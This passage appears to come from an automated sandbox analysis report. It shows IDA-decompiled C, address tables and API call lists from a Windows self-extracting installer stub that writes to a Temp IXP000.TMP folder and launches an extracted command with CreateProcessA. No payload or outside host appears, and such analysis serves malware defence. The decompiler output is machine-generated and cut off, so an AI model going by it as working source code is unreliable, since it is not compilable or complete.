                                                                                                                                                                                                                                      					LocalFree(_t20);
                                                                                                                                                                                                                                      					_t12 = _v8;
                                                                                                                                                                                                                                      					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                                                      						goto L4;
                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                      						CloseHandle(_t12);
                                                                                                                                                                                                                                      						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                                                      						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                                                      							goto L4;
                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                      							 *0x409124 = 0;
                                                                                                                                                                                                                                      							_t14 = 1;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                      					E00404495(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                      					L4:
                                                                                                                                                                                                                                      					 *0x409124 = E00406233();
                                                                                                                                                                                                                                      					_t14 = 0;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				return _t14;
                                                                                                                                                                                                                                      			}













                                                                                                                                                                                                                                      0x00405885
                                                                                                                                                                                                                                      0x00405889
                                                                                                                                                                                                                                      0x0040588b
                                                                                                                                                                                                                                      0x0040588d
                                                                                                                                                                                                                                      0x00405890
                                                                                                                                                                                                                                      0x00405890
                                                                                                                                                                                                                                      0x00405892
                                                                                                                                                                                                                                      0x00405893
                                                                                                                                                                                                                                      0x00405899
                                                                                                                                                                                                                                      0x004058a5
                                                                                                                                                                                                                                      0x004058a9
                                                                                                                                                                                                                                      0x004058d4
                                                                                                                                                                                                                                      0x004058e2
                                                                                                                                                                                                                                      0x004058f9
                                                                                                                                                                                                                                      0x00405900
                                                                                                                                                                                                                                      0x00405903
                                                                                                                                                                                                                                      0x00405909
                                                                                                                                                                                                                                      0x0040590f
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405911
                                                                                                                                                                                                                                      0x00405912
                                                                                                                                                                                                                                      0x00405919
                                                                                                                                                                                                                                      0x00405922
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00405928
                                                                                                                                                                                                                                      0x0040592a
                                                                                                                                                                                                                                      0x00405930
                                                                                                                                                                                                                                      0x00405930
                                                                                                                                                                                                                                      0x00405922
                                                                                                                                                                                                                                      0x004058ab
                                                                                                                                                                                                                                      0x004058b9
                                                                                                                                                                                                                                      0x004058be
                                                                                                                                                                                                                                      0x004058c3
                                                                                                                                                                                                                                      0x004058c8
                                                                                                                                                                                                                                      0x004058c8
                                                                                                                                                                                                                                      0x004058ce

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,004054F0,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0040589F
                                                                                                                                                                                                                                      • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,004054F0,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 004058F9
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,004054F0,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00405903
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,004054F0,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00405912
                                                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,004054F0,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00405919
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                                                                                                                                                                                                                                      • API String ID: 747627703-1619695125
                                                                                                                                                                                                                                      • Opcode ID: 480c5d0d2e8a7ca2d2b9582323a471ad5cdcbd186814667fd0810e4108411339
                                                                                                                                                                                                                                      • Instruction ID: d5c691efdada4a4a2ac8d81c9663a9e908e5b2727222766de983932192ab5655
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 480c5d0d2e8a7ca2d2b9582323a471ad5cdcbd186814667fd0810e4108411339
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E1156726013106BE3242F7A5C0CB9B7E9DDF45360B10413ABA06F22D1CA788C1686AC
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 649 406a00-406a31 call 407105 call 4071b8 GetStartupInfoW 655 406a33-406a42 649->655 656 406a44-406a46 655->656 657 406a5c-406a5e 655->657 659 406a48-406a4d 656->659 660 406a4f-406a5a Sleep 656->660 658 406a5f-406a65 657->658 661 406a71-406a77 658->661 662 406a67-406a6f _amsg_exit 658->662 659->658 660->655 664 406aa5 661->664 665 406a79-406a92 call 406be9 661->665 663 406aab-406ab1 662->663 667 406ab3-406ac4 _initterm 663->667 668 406ace-406ad0 663->668 664->663 665->663 672 406a94-406aa0 665->672 667->668 670 406ad2-406ad9 668->670 671 406adb-406ae2 668->671 670->671 673 406ae4-406af1 call 407010 671->673 674 406b07-406b11 671->674 676 406bd9-406be8 672->676 673->674 681 406af3-406b05 673->681 675 406b14-406b19 674->675 679 406b65-406b68 675->679 680 406b1b-406b1d 675->680 682 406b76-406b83 _ismbblead 679->682 683 406b6a-406b73 679->683 684 406b34-406b38 680->684 685 406b1f-406b21 680->685 681->674 686 406b85-406b86 682->686 687 406b89-406b8d 682->687 683->682 689 406b40-406b42 684->689 690 406b3a-406b3e 684->690 685->679 688 406b23-406b25 685->688 686->687 687->675 688->684 692 406b27-406b2a 688->692 693 406b43-406b5c call 402bf2 689->693 690->693 692->684 695 406b2c-406b32 692->695 697 406bbe-406bc5 693->697 698 406b5e-406b5f exit 693->698 695->688 699 406bd2 697->699 700 406bc7-406bcd _cexit 697->700 698->679 699->676 700->699
                                                                                                                                                                                                                                      C-Code - Quality: 49%
                                                                                                                                                                                                                                      			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                      				signed int* _t25;
                                                                                                                                                                                                                                      				signed int _t26;
                                                                                                                                                                                                                                      				signed int _t29;
                                                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                                                      				signed char _t41;
                                                                                                                                                                                                                                      				signed int _t55;
                                                                                                                                                                                                                                      				signed int _t56;
                                                                                                                                                                                                                                      				intOrPtr _t59;
                                                                                                                                                                                                                                      				signed int _t61;
                                                                                                                                                                                                                                      				signed int _t62;
                                                                                                                                                                                                                                      				intOrPtr* _t64;
                                                                                                                                                                                                                                      				void* _t66;
                                                                                                                                                                                                                                      				void* _t73;
                                                                                                                                                                                                                                      				void* _t74;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				E00407105();
                                                                                                                                                                                                                                      				_push(0x58);
                                                                                                                                                                                                                                      				_push(0x407268);
                                                                                                                                                                                                                                      				E004071B8(__ebx, __edi, __esi);
                                                                                                                                                                                                                                      				 *(_t66 - 0x20) = 0;
                                                                                                                                                                                                                                      				GetStartupInfoW(_t66 - 0x68);
                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t66 - 4)) = 0;
                                                                                                                                                                                                                                      				_t59 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                                                      				_t55 = 0;
                                                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                                                      					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                                                      					if(0 == 0) {
                                                                                                                                                                                                                                      						break;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					if(0 != _t59) {
                                                                                                                                                                                                                                      						Sleep(0x3e8);
                                                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                      						_t61 = 1;
                                                                                                                                                                                                                                      						_t55 = 1;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					L7:
                                                                                                                                                                                                                                      					_t73 =  *0x4088b0 - _t61; // 0x2
                                                                                                                                                                                                                                      					if(_t73 != 0) {
                                                                                                                                                                                                                                      						__eflags =  *0x4088b0; // 0x2
                                                                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                                                                      							 *0x4081e4 = _t61;
                                                                                                                                                                                                                                      							goto L13;
                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                      							 *0x4088b0 = _t61;
                                                                                                                                                                                                                                      							__eflags = E00406BE9(0x4010c0, 0x4010cc);
                                                                                                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                                                                                                      								goto L13;
                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                      								 *((intOrPtr*)(_t66 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                      								_t30 = 0xff;
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                      						_push(0x1f);
                                                                                                                                                                                                                                      						L00406F9E();
                                                                                                                                                                                                                                      						L13:
                                                                                                                                                                                                                                      						_t74 =  *0x4088b0 - _t61; // 0x2
                                                                                                                                                                                                                                      						if(_t74 == 0) {
                                                                                                                                                                                                                                      							_push(0x4010bc);
                                                                                                                                                                                                                                      							_push(0x4010b4); // executed
                                                                                                                                                                                                                                      							L004071B0(); // executed
                                                                                                                                                                                                                                      							 *0x4088b0 = 2;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						if(_t55 == 0) {
                                                                                                                                                                                                                                      							 *0x4088ac = 0;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_t77 =  *0x4088b4;
                                                                                                                                                                                                                                      						if( *0x4088b4 != 0 && E00407010(_t77, 0x4088b4) != 0) {
                                                                                                                                                                                                                                      							_t64 =  *0x4088b4; // 0x0
                                                                                                                                                                                                                                      							 *0x40a288(0, 2, 0);
                                                                                                                                                                                                                                      							 *_t64();
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_t25 = __imp___acmdln; // 0x759d5ba0
                                                                                                                                                                                                                                      						_t62 =  *_t25;
                                                                                                                                                                                                                                      						 *(_t66 - 0x1c) = _t62;
                                                                                                                                                                                                                                      						_t56 =  *(_t66 - 0x20);
                                                                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                                                                      							_t41 =  *_t62;
                                                                                                                                                                                                                                      							if(_t41 > 0x20) {
                                                                                                                                                                                                                                      								goto L32;
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      							if(_t41 != 0) {
                                                                                                                                                                                                                                      								if(_t56 != 0) {
                                                                                                                                                                                                                                      									goto L32;
                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                      									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                                                      										 *_t62 = 0;
                                                                                                                                                                                                                                      										_t41 =  *_t62;
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      							__eflags =  *(_t66 - 0x3c) & 0x00000001;
                                                                                                                                                                                                                                      							if(( *(_t66 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                                                      								_t29 = 0xa;
                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                      								_t29 =  *(_t66 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      							_push(_t29);
                                                                                                                                                                                                                                      							_t30 = E00402BF2(0x400000, 0, _t62); // executed
                                                                                                                                                                                                                                      							 *0x4081e0 = _t30;
                                                                                                                                                                                                                                      							__eflags =  *0x4081f8;
                                                                                                                                                                                                                                      							if( *0x4081f8 == 0) {
                                                                                                                                                                                                                                      								exit(_t30); // executed
                                                                                                                                                                                                                                      								goto L32;
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      							__eflags =  *0x4081e4;
                                                                                                                                                                                                                                      							if( *0x4081e4 == 0) {
                                                                                                                                                                                                                                      								__imp___cexit();
                                                                                                                                                                                                                                      								_t30 =  *0x4081e0; // 0x0
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      							 *((intOrPtr*)(_t66 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                      							goto L40;
                                                                                                                                                                                                                                      							L32:
                                                                                                                                                                                                                                      							__eflags = _t41 - 0x22;
                                                                                                                                                                                                                                      							if(_t41 == 0x22) {
                                                                                                                                                                                                                                      								__eflags = _t56;
                                                                                                                                                                                                                                      								_t14 = _t56 == 0;
                                                                                                                                                                                                                                      								__eflags = _t14;
                                                                                                                                                                                                                                      								_t56 = 0 | _t14;
                                                                                                                                                                                                                                      								 *(_t66 - 0x20) = _t56;
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                                                      							__imp___ismbblead(_t26);
                                                                                                                                                                                                                                      							__eflags = _t26;
                                                                                                                                                                                                                                      							if(_t26 != 0) {
                                                                                                                                                                                                                                      								_t62 = _t62 + 1;
                                                                                                                                                                                                                                      								__eflags = _t62;
                                                                                                                                                                                                                                      								 *(_t66 - 0x1c) = _t62;
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      							_t62 = _t62 + 1;
                                                                                                                                                                                                                                      							 *(_t66 - 0x1c) = _t62;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					L40:
                                                                                                                                                                                                                                      					 *[fs:0x0] =  *((intOrPtr*)(_t66 - 0x10));
                                                                                                                                                                                                                                      					return _t30;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_t61 = 1;
                                                                                                                                                                                                                                      				__eflags = 1;
                                                                                                                                                                                                                                      				goto L7;
                                                                                                                                                                                                                                      			}

















                                                                                                                                                                                                                                      0x00406a00
                                                                                                                                                                                                                                      0x00406a0a
                                                                                                                                                                                                                                      0x00406a0c
                                                                                                                                                                                                                                      0x00406a11
                                                                                                                                                                                                                                      0x00406a18
                                                                                                                                                                                                                                      0x00406a1f
                                                                                                                                                                                                                                      0x00406a25
                                                                                                                                                                                                                                      0x00406a2e
                                                                                                                                                                                                                                      0x00406a31
                                                                                                                                                                                                                                      0x00406a33
                                                                                                                                                                                                                                      0x00406a3c
                                                                                                                                                                                                                                      0x00406a42
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00406a46
                                                                                                                                                                                                                                      0x00406a54
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00406a48
                                                                                                                                                                                                                                      0x00406a4a
                                                                                                                                                                                                                                      0x00406a4b
                                                                                                                                                                                                                                      0x00406a4b
                                                                                                                                                                                                                                      0x00406a5f
                                                                                                                                                                                                                                      0x00406a5f
                                                                                                                                                                                                                                      0x00406a65
                                                                                                                                                                                                                                      0x00406a71
                                                                                                                                                                                                                                      0x00406a77
                                                                                                                                                                                                                                      0x00406aa5
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00406a79
                                                                                                                                                                                                                                      0x00406a79
                                                                                                                                                                                                                                      0x00406a90
                                                                                                                                                                                                                                      0x00406a92
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00406a94
                                                                                                                                                                                                                                      0x00406a94
                                                                                                                                                                                                                                      0x00406a9b
                                                                                                                                                                                                                                      0x00406a9b
                                                                                                                                                                                                                                      0x00406a92
                                                                                                                                                                                                                                      0x00406a67
                                                                                                                                                                                                                                      0x00406a67
                                                                                                                                                                                                                                      0x00406a69
                                                                                                                                                                                                                                      0x00406aab
                                                                                                                                                                                                                                      0x00406aab
                                                                                                                                                                                                                                      0x00406ab1
                                                                                                                                                                                                                                      0x00406ab3
                                                                                                                                                                                                                                      0x00406ab8
                                                                                                                                                                                                                                      0x00406abd
                                                                                                                                                                                                                                      0x00406ac4
                                                                                                                                                                                                                                      0x00406ac4
                                                                                                                                                                                                                                      0x00406ad0
                                                                                                                                                                                                                                      0x00406ad9
                                                                                                                                                                                                                                      0x00406ad9
                                                                                                                                                                                                                                      0x00406adb
                                                                                                                                                                                                                                      0x00406ae2
                                                                                                                                                                                                                                      0x00406af7
                                                                                                                                                                                                                                      0x00406aff
                                                                                                                                                                                                                                      0x00406b05
                                                                                                                                                                                                                                      0x00406b05
                                                                                                                                                                                                                                      0x00406b07
                                                                                                                                                                                                                                      0x00406b0c
                                                                                                                                                                                                                                      0x00406b0e
                                                                                                                                                                                                                                      0x00406b11
                                                                                                                                                                                                                                      0x00406b14
                                                                                                                                                                                                                                      0x00406b14
                                                                                                                                                                                                                                      0x00406b19
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00406b1d
                                                                                                                                                                                                                                      0x00406b21
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00406b23
                                                                                                                                                                                                                                      0x00406b2c
                                                                                                                                                                                                                                      0x00406b30
                                                                                                                                                                                                                                      0x00406b30
                                                                                                                                                                                                                                      0x00406b23
                                                                                                                                                                                                                                      0x00406b21
                                                                                                                                                                                                                                      0x00406b34
                                                                                                                                                                                                                                      0x00406b38
                                                                                                                                                                                                                                      0x00406b42
                                                                                                                                                                                                                                      0x00406b3a
                                                                                                                                                                                                                                      0x00406b3a
                                                                                                                                                                                                                                      0x00406b3a
                                                                                                                                                                                                                                      0x00406b43
                                                                                                                                                                                                                                      0x00406b4b
                                                                                                                                                                                                                                      0x00406b50
                                                                                                                                                                                                                                      0x00406b55
                                                                                                                                                                                                                                      0x00406b5c
                                                                                                                                                                                                                                      0x00406b5f
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00406b5f
                                                                                                                                                                                                                                      0x00406bbe
                                                                                                                                                                                                                                      0x00406bc5
                                                                                                                                                                                                                                      0x00406bc7
                                                                                                                                                                                                                                      0x00406bcd
                                                                                                                                                                                                                                      0x00406bcd
                                                                                                                                                                                                                                      0x00406bd2
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00406b65
                                                                                                                                                                                                                                      0x00406b65
                                                                                                                                                                                                                                      0x00406b68
                                                                                                                                                                                                                                      0x00406b6c
                                                                                                                                                                                                                                      0x00406b6e
                                                                                                                                                                                                                                      0x00406b6e
                                                                                                                                                                                                                                      0x00406b71
                                                                                                                                                                                                                                      0x00406b73
                                                                                                                                                                                                                                      0x00406b73
                                                                                                                                                                                                                                      0x00406b76
                                                                                                                                                                                                                                      0x00406b7a
                                                                                                                                                                                                                                      0x00406b81
                                                                                                                                                                                                                                      0x00406b83
                                                                                                                                                                                                                                      0x00406b85
                                                                                                                                                                                                                                      0x00406b85
                                                                                                                                                                                                                                      0x00406b86
                                                                                                                                                                                                                                      0x00406b86
                                                                                                                                                                                                                                      0x00406b89
                                                                                                                                                                                                                                      0x00406b8a
                                                                                                                                                                                                                                      0x00406b8a
                                                                                                                                                                                                                                      0x00406b14
                                                                                                                                                                                                                                      0x00406bd9
                                                                                                                                                                                                                                      0x00406bdc
                                                                                                                                                                                                                                      0x00406be8
                                                                                                                                                                                                                                      0x00406be8
                                                                                                                                                                                                                                      0x00406a5e
                                                                                                                                                                                                                                      0x00406a5e
                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00407105: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00407132
                                                                                                                                                                                                                                        • Part of subcall function 00407105: GetCurrentProcessId.KERNEL32 ref: 00407141
                                                                                                                                                                                                                                        • Part of subcall function 00407105: GetCurrentThreadId.KERNEL32 ref: 0040714A
                                                                                                                                                                                                                                        • Part of subcall function 00407105: GetTickCount.KERNEL32 ref: 00407153
                                                                                                                                                                                                                                        • Part of subcall function 00407105: QueryPerformanceCounter.KERNEL32(?), ref: 00407168
                                                                                                                                                                                                                                      • GetStartupInfoW.KERNEL32(?,00407268,00000058), ref: 00406A1F
                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 00406A54
                                                                                                                                                                                                                                      • _amsg_exit.MSVCRT ref: 00406A69
                                                                                                                                                                                                                                      • _initterm.MSVCRT ref: 00406ABD
                                                                                                                                                                                                                                      • exit.KERNELBASE ref: 00406B5F
                                                                                                                                                                                                                                      • _ismbblead.MSVCRT ref: 00406B7A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentTime$CountCounterFileInfoPerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 626344529-0
                                                                                                                                                                                                                                      • Opcode ID: 036c14669146b268a5f9343578340efe65e2cf89af6808aedd1debc1c3182bfc
                                                                                                                                                                                                                                      • Instruction ID: 3ef01d0fe81f18753299ef8d1e9bd85a48dfc2c90aef8fa936124bc0f365501b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 036c14669146b268a5f9343578340efe65e2cf89af6808aedd1debc1c3182bfc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F41E371A047618FEB21AB64DA0476A77F0AB85720F25403FE883F73D1CB7C58618A5D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 84%
                                                                                                                                                                                                                                      			E00403FDB(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                      				char _v524;
                                                                                                                                                                                                                                      				long _v528;
                                                                                                                                                                                                                                      				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                      				signed int _t20;
                                                                                                                                                                                                                                      				void* _t22;
                                                                                                                                                                                                                                      				int _t25;
                                                                                                                                                                                                                                      				intOrPtr* _t39;
                                                                                                                                                                                                                                      				signed int _t44;
                                                                                                                                                                                                                                      				void* _t49;
                                                                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                                                                      				intOrPtr _t53;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t45 = __edx;
                                                                                                                                                                                                                                      				_t20 =  *0x408004; // 0xf5e26b31
                                                                                                                                                                                                                                      				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                                                      				_t39 = __ecx;
                                                                                                                                                                                                                                      				_t49 = 1;
                                                                                                                                                                                                                                      				_t22 = 0;
                                                                                                                                                                                                                                      				if(__ecx == 0) {
                                                                                                                                                                                                                                      					L13:
                                                                                                                                                                                                                                      					return E00406C80(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                                                      				asm("stosd");
                                                                                                                                                                                                                                      				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                                                      				if(_t25 == 0) {
                                                                                                                                                                                                                                      					 *0x409124 = E00406233();
                                                                                                                                                                                                                                      					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                                                                                                                                                                                                                                      					_t45 = 0x4c4;
                                                                                                                                                                                                                                      					E00404495(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                                                                                                                                                                                                                                      					L11:
                                                                                                                                                                                                                                      					_t49 = 0;
                                                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                                                      					_t22 = _t49;
                                                                                                                                                                                                                                      					goto L13;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                                                      				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                                                      				_t44 = _v528;
                                                                                                                                                                                                                                      				_t53 =  *0x408a28; // 0x0
                                                                                                                                                                                                                                      				if(_t53 == 0) {
                                                                                                                                                                                                                                      					_t34 =  *0x409a2c; // 0x0
                                                                                                                                                                                                                                      					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                                                      						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                                                      						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                                                      							 *0x409a2c = _t44;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				E00404105(_t34, _t44);
                                                                                                                                                                                                                                      				CloseHandle(_v544.hThread);
                                                                                                                                                                                                                                      				CloseHandle(_v544);
                                                                                                                                                                                                                                      				if(( *0x409a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                                                      					goto L12;
                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                      					goto L11;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      			}


















                                                                                                                                                                                                                                      0x00403fdb
                                                                                                                                                                                                                                      0x00403fe6
                                                                                                                                                                                                                                      0x00403fed
                                                                                                                                                                                                                                      0x00403ff4
                                                                                                                                                                                                                                      0x00403ff6
                                                                                                                                                                                                                                      0x00403ff7
                                                                                                                                                                                                                                      0x00403ffc
                                                                                                                                                                                                                                      0x004040f6
                                                                                                                                                                                                                                      0x00404104
                                                                                                                                                                                                                                      0x00404104
                                                                                                                                                                                                                                      0x00404008
                                                                                                                                                                                                                                      0x00404009
                                                                                                                                                                                                                                      0x0040400a
                                                                                                                                                                                                                                      0x0040400b
                                                                                                                                                                                                                                      0x0040401f
                                                                                                                                                                                                                                      0x00404027
                                                                                                                                                                                                                                      0x004040b6
                                                                                                                                                                                                                                      0x004040d5
                                                                                                                                                                                                                                      0x004040e4
                                                                                                                                                                                                                                      0x004040ed
                                                                                                                                                                                                                                      0x004040f2
                                                                                                                                                                                                                                      0x004040f2
                                                                                                                                                                                                                                      0x004040f4
                                                                                                                                                                                                                                      0x004040f4
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004040f4
                                                                                                                                                                                                                                      0x00404035
                                                                                                                                                                                                                                      0x00404048
                                                                                                                                                                                                                                      0x0040404e
                                                                                                                                                                                                                                      0x00404054
                                                                                                                                                                                                                                      0x0040405a
                                                                                                                                                                                                                                      0x0040405c
                                                                                                                                                                                                                                      0x00404063
                                                                                                                                                                                                                                      0x0040406b
                                                                                                                                                                                                                                      0x00404075
                                                                                                                                                                                                                                      0x00404077
                                                                                                                                                                                                                                      0x00404077
                                                                                                                                                                                                                                      0x00404075
                                                                                                                                                                                                                                      0x00404063
                                                                                                                                                                                                                                      0x0040407d
                                                                                                                                                                                                                                      0x00404088
                                                                                                                                                                                                                                      0x00404094
                                                                                                                                                                                                                                      0x004040a4
